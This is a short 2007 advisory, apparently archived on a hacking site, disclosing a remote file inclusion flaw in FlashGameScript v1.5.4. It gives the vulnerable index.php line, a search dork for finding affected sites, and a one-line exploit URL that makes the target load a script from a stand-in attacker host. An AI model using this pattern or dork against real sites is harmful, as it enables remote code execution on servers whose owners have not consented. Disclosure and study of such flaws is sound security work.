AOH :: HP Unsorted F :: C07-2433.HTM

FlashGameScript v1.5.4 Remote File Inclusion Vulnerability



FlashGameScript v1.5.4 Remote File Inclusion Vulnerability
FlashGameScript v1.5.4 Remote File Inclusion Vulnerability



--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:	: aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version		:1.5.4
URL 		:http://www.flashgamescript.com/ 
Dork		:Copyright =A9 2006-2007 Powered by FlashGameScript.com version 1.5 All Rights Reserved 
Price:		:$60
Description :
Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner=92s profit with additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
=09
at index.php line 28: $func =$_GET[func];
---------------
Exploit:

http://www.target.com/index.php?func=http://attacker.com/evil_script? 

---------------

Greetz to all members of active. Hacking Crew

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.